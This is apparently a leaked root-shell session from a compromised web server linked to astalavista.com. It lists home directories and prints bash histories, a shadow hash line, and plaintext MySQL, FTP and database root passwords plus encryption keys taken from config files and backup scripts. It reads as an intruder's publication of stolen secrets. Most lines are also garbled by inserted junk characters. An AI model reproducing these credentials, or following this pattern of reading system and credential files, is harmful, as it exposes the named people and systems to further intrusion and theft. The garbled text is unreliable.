4 E2 v8 b+ Q2 Gastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::! d+ n# {3 `' Z( U4 e; s
. u8 W6 Y, Q, w6 h( o- @
sh-3.2# cat /etc/motd
1 {$ \: b3 e3 p. c, w#####################################################* B5 _+ s, }! v- R3 h
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #9 ^( u$ o, g0 p7 h3 r7 T; Z/ x4 t1 m+ h
# |__| [__ | |__| | |__| | | | [__ | |__| #$ B) n6 J! m* G/ b% @3 Z
# | | ___] | | | |___ | | \/ | ___] | | | #
. t7 h: N: [+ @# F. U7 v+ d8 Q6 Q# #
4 U$ w$ |! m- e/ \% f0 T#####################################################
! s7 e7 E3 @% g! B9 r4 V# #* M8 V' q/ h2 l7 N3 I5 T) j+ d) r
# Admin Contact - 链接标记support@secureservertech.com #4 F& A4 _( X; U1 e
# #
, f) J( i! T* }7 a! I+ }$ n. Z- F# Available ShortCuts #; \. R8 P/ V1 M! r4 m+ ^2 w
# #1 s$ ^! k% U3 @
# nst - list active connections #0 o( k) T' U; u0 p F" _' \
# ddos - shows how many times each ip is connected #1 G% S) u* g! q4 M8 d3 M& k
# ltr - restart the webserver #
& F0 F' D: ^. {# phpc - edit the php config file #
. |1 `1 f; |+ l: l" T) O# htc - edit the webserver configuration file #2 x8 z" [2 ^- U: `% ~ b- [5 H& E
# up - uptime # M5 O2 ^- \: z( {* A
# etd - edit the motd of the day file #4 i* ^+ ^. P0 y9 D/ v7 B
# htr - start and restart apache if needed #
) s; |. H$ x% ^: s. P# syng - shows active SYN_RECV connections #
' A" n( Z- I8 h _# synd - syn flood blocker - “synd -h” for usage #7 H0 l* q; V+ p
#####################################################3 A3 Q& f( e" j
# NOTES: #
- ~) W+ E1 n! V5 y' j0 t2 ^# Last Upgrade - 12-08-2008 by JF #. @) ~$ j8 e* O8 u4 M& T
# My.cnf/Mysql Optimization - 1-28-09 #2 |& c. g2 X, V
# #8 t* G& x7 j( l6 H$ F/ D8 q, ^& \
# #
" b' i8 c$ u' z/ h2 r% S) i4 h; D# #
5 m; V4 g2 k: Z* y @& E/ d#####################################################
2 u* {9 n2 T( b1 n) a* F7 J$ V# j7 N$ ?9 r
sh-3.2# lastlog | grep -v Never
# L6 q* ^! y7 V7 z% @Username Port From Latest
! A6 `8 s0 Z1 D# E) G. W) `. froot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
) U- f* L" Q. r( k+ _admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 20080 T! n' v0 T1 R
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
6 k9 A5 E2 X2 p8 m: M: L1 Rastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
0 ]- z9 q/ o+ U% K; \" b0 l# @3 k7 k) x; ?% C
sh-3.2# ls -la
6 z; c5 x) H: r6 n Q% l! etotal 4533768 O; d: }7 @' X) [7 j. v/ y; T) g6 i
drwxr-x— 15 root root 4096 Jun 4 08:40 .
$ X: i' B1 c$ Z8 i: W1 W Mdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..8 w, R0 }! M/ {( \9 M+ L
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
- @* B; T0 [! H7 W, B: x' a2 [-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg9 J. @; f) }9 ~/ r7 G+ y, y! I
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
6 L m7 d: k% J0 N# z-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
6 n. a! b4 }6 N; M. \-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
# |( L8 Y) u1 r' a T-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
& C4 ?1 {! {% u/ v% H3 M+ f8 o, d, F-rwx—— 1 root root 1899 Oct 28 2007 bk.sh" u- q1 P2 k: x7 S0 p1 C: l
-rw-r–r– 1 root root 1327 Nov 29 2007 cert
! m+ X) h! Z2 a5 j# [; \, z( i; z-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
. S! [" @# v( Jdrwxr-xr-x 4 root root 4096 May 20 2008 .cpan/ i" x0 v- J: @ h% b' ?& V
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
! G' a$ ]5 d$ Q1 |9 e$ e2 z) E+ U; i& r-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql, d& u& D9 h$ n# k
drwx—— 2 root root 4096 Oct 28 2007 .elinks
% N) I2 L& K0 k j2 A8 ldrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.16 v3 S* R* G" a9 Y
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
( T, S% }( p( k% T-rw——- 1 root root 0 Apr 16 13:19 .history
$ W. s, \1 B5 r! L2 D-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
7 T' v1 S5 h$ c- ~, K-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog" u. F% }$ W: s
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh1 E* O4 t, r8 ^; b/ N5 M# ?
-rw——- 1 root root 35 Jun 2 14:23 .lesshst
% F4 \9 u x' l1 k9 wdrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp; {0 J& Z0 Z F" s5 y
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
6 \* q1 ]' L- @2 ~1 _) G: n |; R- j-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
- ^ J0 t4 Q$ d3 z: n2 ^3 C-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz22 i4 e# @5 {9 e# ?5 t6 h
-rwx—— 1 root root 760 Sep 18 2008 lp) [. e: I/ D% f' c" z1 b! u
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
2 W: ?, P$ E! n5 @" M-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz& H4 i* L6 B3 x" ~1 Z7 o4 [
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
( _& q& E0 V. j% j i. |drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9' M5 }) d( D9 u- m2 S$ K; w. s
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
/ y% E9 C6 h" ?- ?+ U6 Sdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
. {# M8 D- h: }$ Q* [8 K-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz( h! V$ ^/ y" b) y4 i
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
( x* ]6 j2 q3 v-rw——- 1 root root 41 Oct 19 2007 .my.cnf
4 E8 X- E/ ^) F/ @& Y" f1 V-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
; s8 h+ S# l% X: k8 m' W-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
0 r; z6 c3 Q& K, L* m2 t-rw——- 1 root root 41 May 20 2008 .mytop6 n; j( C: L4 u m
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6: J/ F$ }0 z" l+ a/ a
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz- u& [4 z& V5 ]0 Z% U' }: H
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp3 ]! ^$ @! q N! P
-rw——- 1 root root 1462 Sep 21 2007 opt.php
0 I# d6 O$ {. B- t0 o& L/ d; Q+ k-rw-r–r– 1 root root 3371 Sep 22 2007 p" M/ c8 y4 j# W3 |- u
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2$ a3 V$ N! @* }* N" |* U
-rw——- 1 root root 1024 Feb 3 21:32 .rnd) ~4 p: W- Q+ Z! ?( N- m6 L) [
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
& w) U$ Y; F X6 j. [; p-rw-r–r– 1 root root 887 Nov 28 2007 server.key. ?$ j6 L/ x) x @( c
drwx—— 2 root root 4096 Oct 10 2008 .ssh
* W6 I* m+ b0 q-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat, }( `$ I" [1 ?, ~# X: U
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc; B* }, P; G S% R- w5 y
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip- Q% Z( W! u( T) i, j
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1$ Y- d; ~ V3 l0 p/ S+ h6 y
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp' G( V$ V, \7 c
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
) h1 l9 g3 f% K- h( Z) tdrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0" Y3 ?" u* u+ V1 @
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz25 s2 V$ m P7 S( m& q) v7 `- R7 u
-rw——- 1 root root 12997 May 16 2008 .viminfo
: w' q: o$ h* p# J4 q
! P2 X7 r1 S6 l5 nsh-3.2# cat .bash_history
3 V5 R0 D+ t0 `9 ~* u8 K3 q[snip]; S1 O7 R$ ]6 X
wget cp4sst.com/sstlinux.tar.gz! V# }* A, Y0 I+ g) E# r
tar zxvf sstlinux.tar.gz
$ i% b* g# V5 z8 A3 C% A- Y! Jcd linux-2.6.27.10
, r) D" b+ [0 m! r& e0 `1 z4 M( gsh install.sh
1 R) `# k, o( q' G; d. M7 wmake bzImage ; make modules ; make modules_install ; make install0 k8 S% s- R/ ]$ E8 b, R9 D
make clean
4 }$ F Z, X2 g1 c, nservice mysqld restart7 P- J0 W. l, D
[snip]
; k9 O# ]' Y. {cd /usr/sbin/% y' R! Y( x8 I+ C
chmod 4777 traceroute* g" F0 ?* E7 R& e2 U
chmod 4777 ping
) V: F/ ~! j4 t! D6 y) n1 e6 {traceroute -I 链接标记[url]www.astalavista.ch[/url]
4 s: e5 ^3 z& h6 \7 ]2 \+ K[snip]0 b0 ?5 r. V0 }5 G/ W
vi /etc/csf/csf.conf
" z. F/ L5 u0 x) ntraceroute google.ch& I$ p2 w a( n/ I V0 |, D# c5 ~7 P
service csf restart9 o2 A5 z" c$ Q$ M/ ?' a
tracert google.ch8 O1 B- d( u" O% G
service csf restart( e7 v- x0 W X9 L2 S1 q- f
traceroute 链接标记[url]www.google.ch[/url]% b$ X. c4 Q9 ^* N2 l
tracert 链接标记[url]www.google.ch[/url]
' l6 E2 i, M0 \+ i& }6 `" Y$ itraceroute 链接标记[url]www.google.ch[/url]
1 N( i4 p; g1 ~4 Klocate traceroute
- T$ }% Q( {- o4 k( G3 achown 4755 /bin/traceroute, K3 p; x6 u& G
chown 4777 /bin/traceroute1 F5 E' H7 e, I: H* R' g
locate ping
* f% h3 @, r' H, }7 f, A% W8 vchown 4755 /bin/ping2 }- ?8 Q& s0 g5 D2 C0 O! s1 Z
chown 4777 /bin/ping
$ ]% H! K% O, N2 Ecd /bin/
6 N" ^1 j. X; pls -ali | grep ping
+ B. o! F/ x% C+ S2 z$ [chown root ping5 W0 O1 r& }0 r# ~
chmod 4755 ping6 \. Y# Y0 F; h, o2 W% l) z3 Z
ls -ali | grep traceroute. _6 L" Z$ j* m- c0 R8 C) v5 c
chown root traceroute
( J1 X: `3 ]' echmod 4755 traceroute
+ o7 G- a P# q' W- P6 @% Ils -ali | grep traceroute0 L: y; ?. t- D8 ]0 x1 S1 c: q
traceroute -I 链接标记[url]www.google.ch[/url]2 W' E: D9 s, L: m
traceroute 链接标记[url]www.google.ch[/url]
2 E: N8 w! `1 r2 n, ~' Qwhois pmsantos.ch
5 o* V* D5 w t |- g[snip]' w' N% W) K% x+ ~0 L
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
; B* _! u3 g: _- kmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
" n2 r% _$ c# _5 j6 j: Mmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql6 v( Q' F4 @2 p, W5 d. ]/ ?3 u( y
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
0 }4 W+ d, y6 E1 L& @1 htop0 i. |3 n' b6 e( }; p6 a
ping ssth.ch
+ A# y( U$ j) L( @% T3 T2 cping asdlkfaljgasd???ljg???lasj.ch. X! R9 Y7 G* [# ]" I- j
ping asdlkfaljgasdlasj.ch9 R4 z$ i8 {5 q( V
ping 链接标记[url]www.ssth.ch[/url]
; d, F3 i4 q% M% yping ssth.ch& l1 l1 v7 }3 e3 C
nslookup 链接标记[url]www.google.ch[/url]. ^; W$ j6 @6 r2 X" W4 M( q+ X
nslookup 链接标记[url]www.ssth.ch[/url]# [; T0 U' m9 @( [# X0 Q, P
man nslookup
1 L1 n6 M8 b" p7 sping 链接标记[url]www.google.ch[/url] ^+ E. D5 Z* V$ P5 H3 p
nslookup 链接标记[url]www.google.ch[/url]( a4 [! b4 D5 H0 W1 |& W
nslookup 链接标记[url]www.google.ch[/url]
. y4 @% S% I# J3 b% x; ^nslookup salfjasdlf.ch
, m a4 S3 Z" a% \% S! i[snip]
0 A2 q: q6 H1 |3 k* }openssl passwd -1 sadf$ Y/ X; R8 ^/ c1 T# L) B
openssl passwd -1 5cZNHstdTy1 F C+ u5 T1 S5 S7 P
mysql+ s, _* N6 ~7 X# F
mysql+ i6 P( \ J/ M3 ^. w, ^6 q$ @+ S
locate proftp
0 T+ |* [ c7 |vi /etc/proftpd.passwd
; B- D% n& A: j% q: y" r4 _, eservice proftpd restart! E8 i+ C3 R5 V8 x+ }$ I# t0 c3 ~
locate proftpd.conf2 L9 j7 s$ c! D) B% m
vi /etc/proftpd.conf3 O7 V0 b/ O% \! ^
vi /etc/proftpd.passwd5 ~1 }, |2 F( ~: ]0 B
service proftpd restart
& _9 d! ]+ p" j! W [[snip]
0 \/ r' a- ?8 I/bin/sh /home/com/backup_system/backup.sh
9 ?; S0 o: Z, M! Q- e, a* O" p8 G5 Htar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin9 L3 N8 d7 v8 W0 i! f
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql0 m4 L5 d8 r F2 y' v0 ]6 A/ b
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql) h: o: q: d9 P0 V5 ~) h
ls -ali2 m1 \! f) |8 P9 j4 C' m( ?* ^
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
$ Z6 d l; X$ kmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
Y; q' a8 \# V8 Q0 hcrontab -l4 v( {+ e! m$ l7 _
crontab -l
6 `8 x+ L& k9 b) S% v/ ^php -q /home/com/public_html/modifications/cronjobs/securitynews.php* U- G- i0 @/ J" R
/home/com/public_html/modifications/cronjobs/exploits.sh: u' l O! D* G2 v" o
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]& z( ? q! m0 m$ I R/ g
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
0 D' {8 d; S, Ncd lsws-4.0.3
; Z9 e3 v$ [- A' F/ osh install.sh
* h4 Q s! u1 I. M7 R' Auptime% P: |$ _. N: F" K% [
hdparm -tt /dev/sda6 I, }6 ?* X3 u: F1 n! _0 |& u( J
iostat: w F: e9 J+ u+ I' N: w5 ]
yum install iostat8 Q! U4 e7 Z" A) e, Y
iostat( O' e5 S3 A) O7 M N$ ]2 P
whereis iostat
- }; W0 e S! I' `$ ]! Myjm clean all; F2 |8 q( X5 r3 V, o/ j6 ]
yum clean all ; yum -y update
3 T; U/ i. x! g) J g8 P/ p; Kiostat+ L6 f( w) `+ I) u2 s
yum install systat" p$ H6 \( @2 C1 C% b
rpm -qa | grep iostat
" J4 D! b+ e( I! E* p. _8 R1 yrpm -qa | grep sysstat
2 W: c' u7 S: e! Nrpm -qa | grep systat5 ~+ X4 V3 H5 G h
dmesg -c
; U* O' \+ k* Y1 nsysctl -p
; X, T# l5 d7 I! g7 ]7 \uname -r
4 m; i2 ?2 r, x8 e) Y* a$ \cd /usr/src
k- _+ {6 F& N( |& j9 y. O8 ?wget nix101.com/kernels/sstlinux.tar.gz' \, _ ~1 i$ t, x% R
shutdown -r now
* p$ O; V: T9 x6 G( {nano -w /boot/grub/grub.conf% t% C+ i% Q0 Z& E. [
- w1 V# i3 E1 N3 J9 X
sh-3.2# cat .my.cnf# n% T* D/ G! n! [5 f! f
[client]
7 c* K, G# e/ ouser=da_admin
; h2 s' M; k$ p7 N+ W( |. upassword=X9dctmRH" f# z# \* |: O& K; T
& I: Y) X/ Q2 X; E; x5 _7 tsh-3.2# cat /home/com/backup_system/backup.sh8 c8 w' _6 C1 R# j( a# w
#!/bin/sh6 r$ L, K" g0 {: I
#####################################################################
, K+ t* B! V* D$ @- _( v# #- \* u Q+ Q, I1 w) X& }2 E
# incremental backup for astalavista.com #! [" C7 l2 [! h) e1 `
# #
. c: M$ `' P6 {6 P5 z/ B$ D7 h0 ]) Q# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #( \1 l0 v, {% {9 b* z1 P9 K
# #. [- n x! S* T5 x% `" k$ n
#####################################################################+ ?% x2 C6 m5 q: `
[snip]
7 G& N/ e$ k" I7 |' K% APROG_DIR=”/home/com/backup_system”;
% y4 Z# u O, U3 p) tBACKUP_DIR=”/home/com/backups”;
! y1 ]$ S M- h: XDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
+ M6 |8 t3 b I9 h- F* `7 `# ftp for synology backup server# S# z5 Q8 X5 T- U! f9 c) P( t8 Q
FTP_HOST=”212.254.194.163″;
! B: I) q* s8 G0 M+ }FTP_PORT=”21″;$ h A1 R) C: i$ A! }
FTP_USER=”astalavista.com”;# I/ S9 u/ E3 G% D0 j3 ]9 P0 `& h' ?) Y
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
& ]8 m+ I4 x+ k6 z3 e8 j/ @5 zFTP_DIR=”/astalavista.com”;
6 ]- G- I' ?) Z. z# r# database
% i4 A0 m( \+ _DB_HOST=”localhost”;
2 y0 e7 I, |9 pDB_USER=”contrexxuser2″;
1 f8 W/ j0 I" u; W- R3 GDB_PASS=”0fEYNZgXz1pKe”;
$ D0 c3 }9 t1 w# HDB_DATABASE1=”com_contrexx2_live”;
8 @ w( q6 F* o1 L( I& H8 C+ {5 ODB_DATABASE2=”com_contrexx2″;0 E) w5 ?0 `, y, d2 x
[snip]0 @+ J& V; H3 g5 d2 g# ^
ftp -in $FTP_HOST $FTP_PORT <<EOF
2 y3 ~( L* i! }; h. Bquote USER $FTP_USER' t1 z* ?" L7 [, Y6 b
quote PASS $FTP_PASS# ~9 ]( B5 y/ G4 C& j h) n
cd $FTP_DIR1 V7 u, m% T5 P
put $DB_FULLNAME-SQL_Dump.tar
2 d) w; i% u. A5 qput $BACKUP_FULLNAME-Public_HTML.tar
" C+ [' x! z* a' ?close q; I9 b; p8 v6 [5 T5 H0 I
bye1 b2 R2 x, L, e6 u8 e {. j
EOF
/ O. c- ]! h( B+ u z& t1 w! r
1 J3 O, c3 ], D+ bsh-3.2# cd /home# } M! P( [9 M3 L4 b
sh-3.2# ls -la6 d# D0 {$ k& I. q9 M/ \- H
total 120
9 v/ [6 o, q8 @4 G/ [7 fdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
$ P" e1 |1 j/ ~/ q* o" Qdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..5 u3 G- X6 l+ d" E
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin! w( l7 e- `- u% a% S& T5 f0 J
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
% `; ]" C. y$ Z, g% E4 x) c4 s-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
5 T% F5 s" d" h: V# d/ T# Zdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet/ o6 M5 {/ @. u! S" F, y
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
7 {0 ^* V4 w0 `" T% ~4 p5 j8 gdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161- |! X5 Z- e5 s- y; Z+ Q8 O6 m
drwx–x–x 10 com com 4096 Apr 28 12:40 com: X. M) F, z) ]7 {* t
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
2 U. z. ~- \0 ]; v2 j- C, Gdrwx—— 3 jon jon 4096 Sep 21 2007 jon( |8 J& w' d; @- R+ W$ L
drwx—— 2 root root 16384 Sep 11 2007 lost+found
6 |. s, k9 J/ A9 l, U' g3 Pdrwxr-xr-x 2 root root 4096 Sep 14 2007 my" U7 F7 d3 O# }" V
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
; x4 @5 E# |& `$ R4 G& M, \drwx—— 2 jon jon 4096 Sep 15 2007 test
2 j+ Y: h! Z* M% [ T/ ^7 |drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
8 C$ \2 D) a& V, @2 L% w# V2 ^/ a" ]) R2 P! [ x2 U& f# u
sh-3.2# cd admin
- q" ~: O7 `4 i6 v: n+ \, r5 ash-3.2# ls -la! z$ \6 Q$ x' a5 @' F- T3 w& H
total 17358962 E2 `6 `9 J, B1 Y
drwx–x–x 9 admin admin 4096 Nov 28 2007 .
- V9 d. \/ U5 U* ?! a9 [% x3 ]) Idrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..' h: g* a4 M1 V
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
5 K# v5 W. y. _drwx—— 2 admin admin 4096 Sep 28 2007 backups
+ J$ w. {% m1 p- k/ Y5 E/ y-rw——- 1 admin admin 860 Sep 17 2008 .bash_history3 _& x! V' T2 w( X
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout# L; `" L! I7 \ l
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
* }) M+ S+ V+ [6 | u6 f& j$ O& o-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
9 _* o4 U9 E/ J/ Ldrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
% `9 x5 B6 K0 H" Z; z' ddrwx–x–x 6 admin admin 4096 Sep 21 2007 domains
( i- `5 c6 | ]7 S! A, Xdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap
3 W7 j3 K% c! V& J8 t, s-rw-r–r– 1 root root 24 Sep 21 2007 info.php5 D8 Q3 ^7 w+ N$ r) |: y* v" E! D
drwx—— 2 admin admin 4096 Sep 21 2007 mail
2 K" W& F, f2 I. A1 @0 p-rw-r–r– 1 root root 716 Nov 28 2007 server.csr5 h2 A J* D0 Q5 {
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
- x& H$ n% V; R-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow7 W4 X" r6 ]& M! [3 {( }5 n
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
+ Y1 ~* U3 q! N Pdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups; t+ t- R: o- L$ f8 h
9 n% \+ [9 L7 y2 { S/ V
sh-3.2# ..' Y B t1 W7 d" N( g8 e; t0 [3 v
sh-3.2# cd jon1 E. j5 N. s9 G% y: v; h, C
sh-3.2# ls -la& m% \ D o' B; g" U$ o+ N8 Q# w. U
total 364 f9 ?- Q' D0 l$ P9 J
drwx—— 3 jon jon 4096 Sep 21 2007 .
6 c- v' U) g/ z6 S- z: j- ~drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
- d( ]) m# f6 y3 L- [-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
* {7 J0 [2 ~/ D( R-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
5 F' H( t" k7 a9 w-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
/ t0 x* b9 U+ m$ h8 B-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc! q& i! p! ^& ^- c
-rw-r–r– 1 root root 24 Sep 21 2007 info.php# h4 Q: x. l& l, `2 Y! f% w8 y
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html2 a+ O- o0 S( ^8 \( {' @
# I6 g1 N# u y2 n$ nsh-3.2# cd ..7 ]5 ?( z' C' @4 a
sh-3.2# cd test
5 [/ e2 G( j: Q3 C# Y5 {- G- bsh-3.2# ls -la
( G2 z& t$ z$ }& Z! Ftotal 48
) g$ U6 ?* ]: Z6 v0 Bdrwx—— 2 jon jon 4096 Sep 15 2007 .
! `! a8 D; ]2 Z2 r6 m& B, d- v" ]drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
7 L3 d' W# N" i" N3 u-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
- I. D1 i- f6 {% C3 k-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout% Q# V3 N/ H6 p+ X" K
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
1 _9 F6 W( j; L; q( E' t-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
) M( Z: k& ~* |' _2 Lsh-3.2# cat .bash_history" d) u) J% o8 g4 n" M1 }* \
/usr/bin/mysqladmin -u root password PoliuJhytg67
$ O% M/ p7 `7 L" m
! [. a( x" Z# C: ]8 n3 `sh-3.2# cd ..
- ?1 B; D3 k! g( ?8 b6 U: H+ zsh-3.2# cd astanet
2 P$ ~1 g- b/ O* R0 l& o" lsh-3.2# ls -la5 z5 @' x( h0 `+ e
total 52
b2 w! I2 e+ a0 V9 t* Idrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
T* ^; Q& z6 [9 f. x6 b7 W7 odrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..7 }+ v, n( w' t1 P, e
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
! z8 o6 k& F: J-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history, E9 G8 _1 U3 R
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
5 Z8 p1 R- r3 A- F! N7 Y E" z3 E) e& J-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile6 I2 U' t, S, U+ A1 e6 d! D. d
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc# l8 b- o5 D2 q3 e' y/ U( W6 F
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains x2 @; U4 }7 e% g ^
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap4 N6 P) f9 y4 h3 A
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
3 k4 u- C! f0 b" F! W, J-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
9 S5 o4 w9 ]& U Vlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html6 k0 K2 j# ~" u% ?; `+ |* @
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow3 f" R& t: Q5 X5 ^
7 w& J9 U' N9 e' W
sh-3.2# cd auth/* [3 W4 |6 C' f! r: g
sh-3.2# ls -la6 O3 P' }6 S* s- I
total 28. F: J! y, b+ e; P Q y
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
5 @( ~6 k& ^+ @" g# i; h; ]drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..) D& M3 o4 u5 U' Q
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php% [- N4 |6 I" W
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php- G/ I1 o& A$ f( ~+ X Y# R H
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd* _2 z- C# a4 T+ _" G. O
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting _3 s. @7 M: ~$ y. S9 |
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd1 `5 s/ ?3 b& L. n5 H8 y. h, V
4 I4 [) n7 X' k+ ~ y/ csh-3.2# cat hackercontest.config.inc.php
7 ?: D. M6 E+ O) n) R; ?+ D<?PHP
7 R4 R5 w; ~$ G0 S% ]- X/ _) D7 Q9 m// Variabeln f?r Verbindung zur Datenbank //$ q" w! L8 M% l n* y! M7 o' m
$conxHost = ‘localhost’; // MySQL hostname
: ~, S; \3 b+ l* N$conxUser = ‘hackercontest’; // MySQL user* M& n F6 O( G( Z+ e$ k
$conxPassword = ‘K6m@7dUc’; // MySQL password) T& k3 w7 R; H' u: g6 g
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish: |% v" ]5 K1 Y7 A$ @
?>
. J) t' R: E E+ D6 qsh-3.2# cat hosting.config.inc.php
( I/ g, V8 Z2 O7 _<?PHP
( P" N9 K* w! {// Variabeln f?r Verbindung zur Datenbank //
+ n( I$ P* m4 n9 y3 N- q4 m$conxHost = ‘localhost’; // MySQL hostname
& L. L/ ?- J" c( x7 Y6 R0 J, C: f1 ~$conxUser = ‘hostinguser’; // MySQL user
3 R/ O9 o- W' T4 S7 u' W0 @$conxPassword = ‘cXvB3981′; // MySQL password
; @7 n m+ A9 D0 h% Z$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish6 `! h5 U7 [/ U" G! E
